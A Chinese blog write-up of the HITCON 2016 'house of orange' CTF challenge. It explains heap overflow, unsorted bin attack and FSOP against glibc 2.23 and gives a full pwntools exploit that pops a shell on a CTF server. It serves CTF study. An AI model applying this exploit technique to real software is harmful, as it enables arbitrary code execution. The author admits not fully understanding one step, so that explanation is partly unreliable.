houseoforange_hitcon_2016(unsortbin attack,fsop)

最新推荐文章于 2024-07-26 22:10:30 发布
最新推荐文章于 2024-07-26 22:10:30 发布
阅读量455 收藏
点赞数
分类专栏: PWN 文章标签: 堆溢出 Glibc unsortedbin攻击 libc基址泄露 system shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121344075
版权

houseoforange_hitcon_2016:

很经典的一道题目,checsec一下,保护全开
请添加图片描述

程序分析:

这题最主要就是没有free

漏洞分析:

edit里的length和add里的length没有联系,
我们可以造成堆溢出
请添加图片描述

大致思路:

1.释放到unsortbin中,泄露libc_base和heap_addr:
利用堆溢出,改Top_chunk_size为一个较小的值,我们再申请一个大于Top_chunk_size的chunk的话,系统会用sysmalloc来分配堆,如果符合sysmalloc条件的话,原来的top chunk就会释放到unsorted bin中,
我们就能泄露main_arena和libc_base了,同时为了泄露heap_addr,要申请一个large bin,它的fd_nextsize和bk_nextsize中指向自身
(注意泄露的时候的字符处理)
泄露出来后计算出:
system,_IO_list_all,heap_base

使用条件有:
①可以修改topchunk的size
②伪造的 size 必须要对齐到内存页
③size 要大于 MINSIZE(0x10)
④size 要小于之后申请的 chunk size + MINSIZE(0x10)
⑤size 的 prev inuse 位必须为 1
其中第二点要特别注意,这导致了我们修改topchunk的size的时候要注意4k对齐
例: 在覆盖之前 top chunk 的 size 大小是 20fe1,地址是 0x602020,通过计算得知
0x602020+0x20fe0=0x623000 是对于 0x1000(4kb)对齐的

所以我们伪造的size加上地址也要4k对齐,一般是0x0fe1、0x1fe1、0x2fe1、0x3fe1、0xfe1
———————————————— 版权声明:本文为CSDN博主「Carol7S」的原创文章,遵循CC 4.0
BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/carol2358/article/details/108367870

2.利用unsortbin_attack,改IO_list_all指向unsorted bin的头chunk地址:
我们把IO_list_all-0x10填入unsortbin的bk
会造成IO_list_all指向main_arena中存的unsorted_bin_addr,是 main_arena + 0x58的地址,我们现在把它看作IO_file_plus结构体,它偏移0x68处是_chain的位置,即main_arena + 0x58+0x68=main_arena+0xc0处,而以malloc_state结构来看,存的是small bin的头地址
我们把unsorted bin的头结点的size改成0x60,(偏移0x60,偏移0x68存的值都是unsortbin的地址,所以size0x60,和0x68都行,不知道是不是这原因)这样当我们调用malloc,glibc会整理unsorted bin,把对应size的chunk放入对应的bin里面。(后面会检查,还会利用那个报错)此时,size为0x60,属于small_bin,这样就指向我们控制的堆里了

3.在unsortbin中伪造IO_file_plus和vtable结构:
fake_file这么填:
摘自__lifanxin师傅

# 设 chunk_addr
{
  file = {
    _flags = "/bin/sh\x00", # binsh 字符串     chunk_addr + 0x0
    _IO_read_ptr = 0x0,
    _IO_read_end = 0x0,
    _IO_read_base = 0x0,
    _IO_write_base = 0x0,   #                  chunk_addr + 0x20
    _IO_write_ptr = 0x1,    # 保证 ptr > base  chunk_addr + 0x28
  	...
  	...
  },                        # vtable_addr = chunk_addr + 0xd8
  vtable = heap_addr        # 堆上另一个可控地址 heap_addr = chunk_addr + 0xe0
}

heap_addr {
  __dummy = 0x0,
  __dummy2 = 0x0,
  __finish = 0x0,
  __overflow = system,      # _IO_OVERFLOW 覆盖为 system 的地址,其第一个参数就是chunk_addr 
    ...                     # 因此这样构造我们就实现了 system("/bin/sh\x00")
	...
}

4.最后再malloc:
由于unsorted bin里的指针被修改了,发生malloc_printerr报错,而malloc_printerr用到了__IO_list_all指针,会从__IO_list_all指向的地方开始查找合适的FILE结构。调用里面vtable里的函数,我们在vtable里放入了system函数;以_flag的地址为参数,我们填入了/bin/sh

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './houseoforange_hitcon_2016'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29247 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#-----------------------------------
def add(length,name,price):
        sla('Your choice : ','1')
        sla('Length of name :',str(length))
        sa('Name :',name)
        sla('Price of Orange:',str(price))
        sla('Color of Orange:','1')
def show():
        sla('Your choice : ','2')
def edit(length,name,price):
        sla('Your choice : ','3')
        sla('Length of name :',str(length))
        sa('Name:',name)
        sla('Price of Orange: ',str(price))
        sla('Color of Orange: ','1')

#------------free_to_unsortbin----
add(0x20,'aaaa',0x10)
edit(0x50,'a'*0x20+p64(0)+p64(0x21)+p32(0x10)+p32(0x1f)+p64(0)*2+p64(0xf91),0x10)
add(0x1000,'bbbb',0x10)
#----------leak_libc_base---------
add(0x400,'a',0x10)
show()
main_area_xx=uu64(ru('\x7f')[-6:])
IO_list_all=(main_area_xx & 0xfffffffffffff000)+(libc.sym['_IO_list_all'] & 0xfff)
print 'IO_list='+str(hex(IO_list_all))
libc_base=IO_list_all-libc.sym['_IO_list_all']
system=libc_base+libc.sym['system']
print 'libc_base='+str(hex(libc_base))
#--------leak heap_addr-----------
edit(0x10,'c'*0x10,0x10)
show()
ru('c'*0x10)
heap_base=uu64(ru('\n')[:-1])-0xd0
print hex(heap_base)
#debug()
#---------------------------------
payload='a'*0x400+p64(0)+p64(0x21)+'a'*0x10
fake_file='/bin/sh\x00'+p64(0x68)
fake_file+=p64(0)+p64(IO_list_all-0x10)
fake_file+=p64(0) + p64(1)
fake_file=fake_file.ljust(0xc0,'\x00')
fake_file+=p64(0)*3
fake_file+=p64(heap_base + 0x5d8)
#----------------------
fake_file+=p64(0)*2
fake_file+=p64(system)
payload+=fake_file
edit(len(payload),payload,0x10)
#debug()
sla('Your choice : ','1')
#debug()
r.interactive()

其他:

水平有限,第二步还是有点不懂,如有错误还望见谅
参考师傅:
https://blog.csdn.net/seaaseesa/article/details/104314949
https://blog.csdn.net/A951860555/article/details/116425824
https://blog.csdn.net/carol2358/article/details/108367870

Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
houseoforange_hitcon_2016
fayinq的博客
04-07 263
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
houseoforange_hitcon_2016House of orange, unsorted bin attackFSOP
weixin_44145820的博客
04-27 1567
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
堆溢出-off-by-one-b00ks
最新发布
zhuo1358的博客
07-26 360
堆溢出_off_by_one,经典题目b00ks
houseoforange_hitcon_2016 House of orange
wuyvle的博客
04-14 1231
这个题可真是经典,甚至连方法都是来源于此 看了看 防御全开 看看函数 根据题分析,本题是没有释放功能的,但是如果没有空闲的chunk我们难以获取libc地址 但是如果我们申请的chunk大小比top chunk大,这里需要满足几个条件: topchunk size > MINSIZE(0x10) top chunk inuse位为1 修改之后的 size 必须要对齐到内存页 我们add函数大小和次数都有限制,所以我们要修改top chunk的size位,使其进入unsorted bins。 还涉及
2016 ctf-HITCON——houseoforange
04-25 399
64位程序,保护全开  #house of orange #unsorted bin attack #IO_FILE 程序逻辑 1 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) 2 { 3 signed int v3; // eax 4 5 main_init()...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
IO_FILE——FSOPhouse of orange
「 虚幻私塾」
01-20 322
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 FSOP 是 File Stream Oriented  Programming 的缩写。所有的 _IO_FILE 结构会由 _chain 字段连接形成一个链表,由 _IO_list_all 来维护。而 FSOP 的核心思想就是劫持通过 _IO_list_all 的值
ctf-HITCON-2016-houseoforange学习
weixin_30266829的博客
01-10 255
目录 堆溢出点 利用步骤   创建第一个house,修改top_chunk的size   创建第二个house,触发sysmalloc中的_int_free   创建第三个house,泄露libc和heap的地址   创建第四个house,触发异常 一点疑惑 参考资料 堆溢出点 图1  堆溢出点   edit函数中没有对那么长度进行校验。 利用步骤 创建第一个...
2016-HitCon-Pwn-house_of_orange学习(附赠FSOP基础知识)
a2590035252的博客
10-25 610
[md]这里开始著名的house of orange利用方式讲解 house of orange 介绍 House of Orange 与其他的 House of XX 利用方法不同,这种利用方法来自于 Hitcon CTF 2016 中的一道同名题目。由于这种利用方法在此前的 CTF 题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为 House of Orange。 概述 House of Orange 的利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在 free
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1162
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
unsort bin attack -攻防世界 noleak
csdn546229768的博客
12-09 720
带着问题的学习是有效的 例题:攻防世界noleak ,这题解法好像有多种但是我是刚接触堆也是抱着学习的姿势学习攻击思路,这里就先例举我看明白的2种方式(爆破(在爆破__malloc_hook文章里面)、unsort bin攻击) 在ida分析后得到以下结果: 总结: 1.用于保存chunk指针的bss数组最多存储10个 2.free时有double free、uaf漏洞 3.可以编辑free chunk数据,有堆溢出漏洞 4.因为程序简单但是因为开了got不可写的措施导致题目有了很多玩法 没有开N
从wiki 重新打基础之 Unsorted Bin Attack
qq_41071646的博客
07-19 407
之所以 看 Unsorted Bin Attack 因为感觉 Fastbin 还有 UAF算是比较熟悉的 所以 直接看 Unsorted Bin 其实Unsorted Bin 也是比较熟悉的 在泄露 libc库的时候就认真的看过 这个东西 ,是当small chunk或large chunkfree掉之后,不会直接进入smallbin或largebin,而是会先进入unsorte...
13.unsorted_bin_attack
06-09 220
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main(){ 5 fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into...
12.unsorted_bin_into_stack
06-09 253
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <stdint.h> 4 5 int main() { 6 intptr_t stack_buffer[4] = {0}; 7 8 fprintf(stderr, "Allocating t...
ciscn_2019_final_2(合并为unsortbin,doublefree)
m0_51251108的博客
11-02 492
ciscn_2019_final_2: 这题对我来说太难啦,写篇博文好好理理思路,如有错误,还望指正 参考师傅:ha1vk checksec一下 64位,保护全开 逆向分析: 主界面main函数: init函数: Sandbox_Loading()函数: 开了个沙盒,貌似啥都用不了了 allocate()函数: 说错啦,第三行字那里,复制可以帮我们改到size free函数: show函数: byebye函数: 大致思路: 堆利用用劫持_IO_2_1_stdin_结构体,修改文件描述符为66
glibc源码分析-malloc-free
kidsama123的博客
04-19 668
简要分析malloc和free源码
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值